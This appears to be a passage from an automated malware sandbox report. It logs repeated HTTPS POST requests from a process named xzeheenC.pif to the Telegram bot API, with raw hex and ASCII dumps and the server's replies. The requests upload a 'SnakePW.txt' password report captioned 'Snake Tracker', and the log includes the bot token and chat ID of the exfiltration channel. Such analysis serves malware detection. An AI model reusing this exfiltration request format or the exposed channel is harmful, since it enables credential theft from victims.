                                                                                                        2024-12-18 15:31:47 UTC515INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 31 39 31 33 32 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 30 38 37 36 31 33 39 34 34 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 77 61 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 69 6d 70 6f 72 74 61 6e 74 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 30 32 35 36 36 32 39 36 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4e 20 54 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 56 65 72 79 5f 69 6d 70 6f 72 74 6e 61 74 5f 67 75 79 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 34 35 33 35 39 30 37 2c 22 64 6f 63 75 6d 65 6e
                                                                                                        Data Ascii: {"ok":true,"result":{"message_id":419132,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1734535907,"documen


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        58192.168.2.849782149.154.167.2204437064C:\Users\Public\Libraries\xzeheenC.pif
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2024-12-18 15:31:47 UTC328OUTPOST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                                                        Content-Type: multipart/form-data; boundary=------------------------8dd2070e745a6df
                                                                                                        Host: api.telegram.org
                                                                                                        Content-Length: 535
                                                                                                        2024-12-18 15:31:47 UTC535OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 32 30 37 30 65 37 34 35 61 36 64 66 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 68 75 62 65 72 74 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 31 32 34 34 30 36 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 31 38 2f 31 32 2f 32 30 32 34 20 2f 20 31 30 3a 33 31 3a 30 30 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
                                                                                                        Data Ascii: --------------------------8dd2070e745a6dfContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:124406Date and Time: 18/12/2024 / 10:31:00Client IP:
                                                                                                        2024-12-18 15:31:48 UTC388INHTTP/1.1 200 OK
                                                                                                        Server: nginx/1.18.0
                                                                                                        Date: Wed, 18 Dec 2024 15:31:48 GMT
                                                                                                        Content-Type: application/json
                                                                                                        Content-Length: 515
                                                                                                        Connection: close
                                                                                                        Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                        Access-Control-Allow-Origin: *
                                                                                                        Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                        Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                        2024-12-18 15:31:48 UTC515INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 31 39 31 33 34 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 30 38 37 36 31 33 39 34 34 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 77 61 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 69 6d 70 6f 72 74 61 6e 74 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 30 32 35 36 36 32 39 36 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4e 20 54 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 56 65 72 79 5f 69 6d 70 6f 72 74 6e 61 74 5f 67 75 79 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 34 35 33 35 39 30 38 2c 22 64 6f 63 75 6d 65 6e
                                                                                                        Data Ascii: {"ok":true,"result":{"message_id":419134,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1734535908,"documen


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        59192.168.2.849783149.154.167.2204436760C:\Users\Public\Libraries\xzeheenC.pif
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2024-12-18 15:31:48 UTC328OUTPOST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                                                        Content-Type: multipart/form-data; boundary=------------------------8dd2149110694f3
                                                                                                        Host: api.telegram.org
                                                                                                        Content-Length: 535
                                                                                                        2024-12-18 15:31:48 UTC535OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 32 31 34 39 31 31 30 36 39 34 66 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 68 75 62 65 72 74 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 31 32 34 34 30 36 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 31 38 2f 31 32 2f 32 30 32 34 20 2f 20 31 30 3a 33 30 3a 33 38 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
                                                                                                        Data Ascii: --------------------------8dd2149110694f3Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:124406Date and Time: 18/12/2024 / 10:30:38Client IP:
                                                                                                        2024-12-18 15:31:49 UTC388INHTTP/1.1 200 OK
                                                                                                        Server: nginx/1.18.0
                                                                                                        Date: Wed, 18 Dec 2024 15:31:48 GMT
                                                                                                        Content-Type: application/json
                                                                                                        Content-Length: 515
                                                                                                        Connection: close
                                                                                                        Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                        Access-Control-Allow-Origin: *
                                                                                                        Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                        Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                        2024-12-18 15:31:49 UTC515INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 31 39 31 33 36 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 30 38 37 36 31 33 39 34 34 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 77 61 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 69 6d 70 6f 72 74 61 6e 74 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 30 32 35 36 36 32 39 36 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4e 20 54 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 56 65 72 79 5f 69 6d 70 6f 72 74 6e 61 74 5f 67 75 79 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 34 35 33 35 39 30 38 2c 22 64 6f 63 75 6d 65 6e
                                                                                                        Data Ascii: {"ok":true,"result":{"message_id":419136,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1734535908,"documen


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        60192.168.2.849788149.154.167.2204433428C:\Users\Public\Libraries\xzeheenC.pif
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2024-12-18 15:31:49 UTC328OUTPOST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                                                        Content-Type: multipart/form-data; boundary=------------------------8dd20e53751f75b
                                                                                                        Host: api.telegram.org
                                                                                                        Content-Length: 535
                                                                                                        2024-12-18 15:31:49 UTC535OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 32 30 65 35 33 37 35 31 66 37 35 62 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 68 75 62 65 72 74 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 31 32 34 34 30 36 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 31 38 2f 31 32 2f 32 30 32 34 20 2f 20 31 30 3a 33 30 3a 35 33 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
                                                                                                        Data Ascii: --------------------------8dd20e53751f75bContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:124406Date and Time: 18/12/2024 / 10:30:53Client IP:
                                                                                                        2024-12-18 15:31:50 UTC388INHTTP/1.1 200 OK
                                                                                                        Server: nginx/1.18.0
                                                                                                        Date: Wed, 18 Dec 2024 15:31:49 GMT
                                                                                                        Content-Type: application/json
                                                                                                        Content-Length: 515
                                                                                                        Connection: close
                                                                                                        Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                        Access-Control-Allow-Origin: *
                                                                                                        Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                        Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                        2024-12-18 15:31:50 UTC515INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 31 39 31 33 38 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 30 38 37 36 31 33 39 34 34 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 77 61 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 69 6d 70 6f 72 74 61 6e 74 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 30 32 35 36 36 32 39 36 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4e 20 54 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 56 65 72 79 5f 69 6d 70 6f 72 74 6e 61 74 5f 67 75 79 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 34 35 33 35 39 30 39 2c 22 64 6f 63 75 6d 65 6e
                                                                                                        Data Ascii: {"ok":true,"result":{"message_id":419138,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1734535909,"documen


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        61192.168.2.849789149.154.167.2204437064C:\Users\Public\Libraries\xzeheenC.pif
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2024-12-18 15:31:49 UTC352OUTPOST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                                                        Content-Type: multipart/form-data; boundary=------------------------8dd208793074bc2
                                                                                                        Host: api.telegram.org
                                                                                                        Content-Length: 535
                                                                                                        Connection: Keep-Alive
                                                                                                        2024-12-18 15:31:49 UTC535OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 32 30 38 37 39 33 30 37 34 62 63 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 68 75 62 65 72 74 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 31 32 34 34 30 36 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 31 38 2f 31 32 2f 32 30 32 34 20 2f 20 31 30 3a 33 31 3a 30 30 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
                                                                                                        Data Ascii: --------------------------8dd208793074bc2Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:124406Date and Time: 18/12/2024 / 10:31:00Client IP:
                                                                                                        2024-12-18 15:31:50 UTC388INHTTP/1.1 200 OK
                                                                                                        Server: nginx/1.18.0
                                                                                                        Date: Wed, 18 Dec 2024 15:31:50 GMT
                                                                                                        Content-Type: application/json
                                                                                                        Content-Length: 515
                                                                                                        Connection: close
                                                                                                        Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                        Access-Control-Allow-Origin: *
                                                                                                        Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                        Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                        2024-12-18 15:31:50 UTC515INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 31 39 31 34 30 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 30 38 37 36 31 33 39 34 34 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 77 61 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 69 6d 70 6f 72 74 61 6e 74 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 30 32 35 36 36 32 39 36 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4e 20 54 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 56 65 72 79 5f 69 6d 70 6f 72 74 6e 61 74 5f 67 75 79 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 34 35 33 35 39 31 30 2c 22 64 6f 63 75 6d 65 6e
                                                                                                        Data Ascii: {"ok":true,"result":{"message_id":419140,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1734535910,"documen


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        62192.168.2.849790149.154.167.2204436760C:\Users\Public\Libraries\xzeheenC.pif
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2024-12-18 15:31:50 UTC328OUTPOST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                                                        Content-Type: multipart/form-data; boundary=------------------------8dd2164183e6431
                                                                                                        Host: api.telegram.org
                                                                                                        Content-Length: 535
                                                                                                        2024-12-18 15:31:50 UTC535OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 32 31 36 34 31 38 33 65 36 34 33 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 68 75 62 65 72 74 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 31 32 34 34 30 36 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 31 38 2f 31 32 2f 32 30 32 34 20 2f 20 31 30 3a 33 30 3a 33 38 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
                                                                                                        Data Ascii: --------------------------8dd2164183e6431Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:124406Date and Time: 18/12/2024 / 10:30:38Client IP:
                                                                                                        2024-12-18 15:31:51 UTC388INHTTP/1.1 200 OK
                                                                                                        Server: nginx/1.18.0
                                                                                                        Date: Wed, 18 Dec 2024 15:31:50 GMT
                                                                                                        Content-Type: application/json
                                                                                                        Content-Length: 515
                                                                                                        Connection: close
                                                                                                        Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                        Access-Control-Allow-Origin: *
                                                                                                        Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                        Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                        2024-12-18 15:31:51 UTC515INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 31 39 31 34 32 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 30 38 37 36 31 33 39 34 34 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 77 61 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 69 6d 70 6f 72 74 61 6e 74 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 30 32 35 36 36 32 39 36 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4e 20 54 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 56 65 72 79 5f 69 6d 70 6f 72 74 6e 61 74 5f 67 75 79 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 34 35 33 35 39 31 30 2c 22 64 6f 63 75 6d 65 6e
                                                                                                        Data Ascii: {"ok":true,"result":{"message_id":419142,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1734535910,"documen


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        63192.168.2.849795149.154.167.2204433428C:\Users\Public\Libraries\xzeheenC.pif
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2024-12-18 15:31:51 UTC328OUTPOST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                                                        Content-Type: multipart/form-data; boundary=------------------------8dd20ff88b239de
                                                                                                        Host: api.telegram.org
                                                                                                        Content-Length: 535
                                                                                                        2024-12-18 15:31:51 UTC535OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 32 30 66 66 38 38 62 32 33 39 64 65 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 68 75 62 65 72 74 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 31 32 34 34 30 36 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 31 38 2f 31 32 2f 32 30 32 34 20 2f 20 31 30 3a 33 30 3a 35 33 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
                                                                                                        Data Ascii: --------------------------8dd20ff88b239deContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:124406Date and Time: 18/12/2024 / 10:30:53Client IP:
                                                                                                        2024-12-18 15:31:51 UTC388INHTTP/1.1 200 OK
                                                                                                        Server: nginx/1.18.0
                                                                                                        Date: Wed, 18 Dec 2024 15:31:51 GMT
                                                                                                        Content-Type: application/json
                                                                                                        Content-Length: 515
                                                                                                        Connection: close
                                                                                                        Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                        Access-Control-Allow-Origin: *
                                                                                                        Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                        Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                        2024-12-18 15:31:51 UTC515INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 31 39 31 34 34 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 30 38 37 36 31 33 39 34 34 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 77 61 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 69 6d 70 6f 72 74 61 6e 74 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 30 32 35 36 36 32 39 36 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4e 20 54 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 56 65 72 79 5f 69 6d 70 6f 72 74 6e 61 74 5f 67 75 79 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 34 35 33 35 39 31 31 2c 22 64 6f 63 75 6d 65 6e
                                                                                                        Data Ascii: {"ok":true,"result":{"message_id":419144,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1734535911,"documen


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        64192.168.2.849796149.154.167.2204437064C:\Users\Public\Libraries\xzeheenC.pif
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2024-12-18 15:31:51 UTC328OUTPOST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                                                        Content-Type: multipart/form-data; boundary=------------------------8dd209cd6857f2c
                                                                                                        Host: api.telegram.org
                                                                                                        Content-Length: 535
                                                                                                        2024-12-18 15:31:51 UTC535OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 32 30 39 63 64 36 38 35 37 66 32 63 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 68 75 62 65 72 74 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 31 32 34 34 30 36 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 31 38 2f 31 32 2f 32 30 32 34 20 2f 20 31 30 3a 33 31 3a 30 30 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
                                                                                                        Data Ascii: --------------------------8dd209cd6857f2cContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:124406Date and Time: 18/12/2024 / 10:31:00Client IP:
                                                                                                        2024-12-18 15:31:52 UTC388INHTTP/1.1 200 OK
                                                                                                        Server: nginx/1.18.0
                                                                                                        Date: Wed, 18 Dec 2024 15:31:52 GMT
                                                                                                        Content-Type: application/json
                                                                                                        Content-Length: 515
                                                                                                        Connection: close
                                                                                                        Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                        Access-Control-Allow-Origin: *
                                                                                                        Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                        Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
